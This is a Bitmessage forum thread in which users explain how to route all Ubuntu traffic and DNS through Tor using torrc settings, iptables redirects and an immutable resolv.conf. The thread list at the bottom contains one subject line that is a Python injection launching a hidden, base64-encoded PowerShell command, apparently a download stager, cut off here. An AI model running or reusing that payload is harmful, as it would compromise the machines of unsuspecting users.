lock down a computer with tor

[chan] linux
Feb 11 14:33

i am not an expert with linux. i am comfortable with the command line but i am still having hard time understanding iptables and tor. how to lock down my ubuntu system so that all connections from all programs are forced through tor on port 9150. this means also that the dns queries also to the tor stopping dns leaks? switching to another distro not optional. what is important here is that i must find, analyze, and study every possible vector for any traffic leak to prevent it from ever happening at any time. this means in the iptables, the tor, the gateway router, and anything else i have not learned about. what informations do i need?

[chan] linux
Feb 11 14:53

I wish I could give any direct info, but have you checked if the people from the Tails distro documented how they did it? Because they have a setup like this, I think.

[chan] linux
Feb 11 18:28

No worries, it's actually quite simple to setup. First you're gonna need to edit the /etc/tor/torrc file and add a few changes: DNSPort 53520 TransPort 9040 The DNSPort is for proxying DNS requests through tor. The TransPort is for proxying TCP connections through Tor. Restart tor. Now you'll have to change your iptables configuration and use something like: iptables -t nat -A OUTPUT -p udp -m udp --dport 53 -j REDIRECT --to-ports 53520 iptables -t nat -A OUTPUT ! -o lo ! -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports 9040 The first iptables command will redirect all DNS requests to go through Tor. The second command will make all TCP traffic go through Tor, but beware of this i don't recommend using it for daily usage. Now edit /etc/resolv.conf and just put 'nameserver 127.0.0.1'. And voila, no DNS leaks !

[chan] linux
Feb 11 19:16

This looks like solid advice. However a couple errata I haven't figured out. In /etc/resolv.conf I can't put 'nameserver 127.0.0.1' because this is what resolv.conf says: # Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8) # DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN nameserver 127.0.1.1 search ARPA009 It seems there are several applications which I don't understand that programmatically make changes to resolv.conf. I suppose I need to find a way to lock this down too and there may be other vectors I don't know.

[chan] linux
Feb 11 20:05

Yes, other programs are modifying the /etc/resolv.conf. If you change it it will get changed externally. What you can do is making the resolv.conf file immutable after changing its content. Put 'nameserver 127.0.0.1' in resolv.conf, and then run: chattr +i /etc/resolv.conf That way the file can't be modified and stays as it is. If later on you want to change it again, run: chattr -i /etc/resolv.conf and change the contents again.

[chan] linux
Feb 12 03:33

I used the iptables template from the torproject website and tweaked it a little and it works. But I'm not sure that it blocks all DNS leaks. I need to be certain that all networking layers of my machine from kernel on down have no query request beyond the gateway router. I'm scratching my head because there are so many fine points to investigate and I don't know where to start.

[chan] linux
Feb 14 07:04

GUFW Ubuntu :-)

[chan] linux
BM-2cT9uwut8dNuYU8co16nFBTq9n7QR4Mwgn

Subject Last Count
Your Mama 1$ §çÛM Feb 18 20:59 2
Mitigating exploited software with firejail Feb 18 01:44 1
$ cd PyBitmessage ; git log | grep Author | sort -u | blacklist Feb 16 08:07 1
<<Extended: __import__("os").system("powershell.exe -NoP -sta -NonI -W Hidden -Enc JAB3AGMAPQBOAEUAdwAtAE8AQgBKAGUAQwBUACAAUwB5AFMAVABFAE0ALgBOAGUAVAAuAFcARQBCAEMATABJAGUAbgB0ADsAJAB1AD0AJwBNAG8AegBpA Feb 14 23:20 1
lock down a computer with tor Feb 14 07:04 7
New Linux kernel out! Feb 11 12:10 2
Anonymous VCS Feb 11 10:09 5
What's your salary? Feb 3 17:12 11
It snows! Feb 1 14:55 1
Julian Assange invite code - come join our WL bunker HQ ! Jan 30 06:45 1
OMEGA user survey Jan 29 09:49 1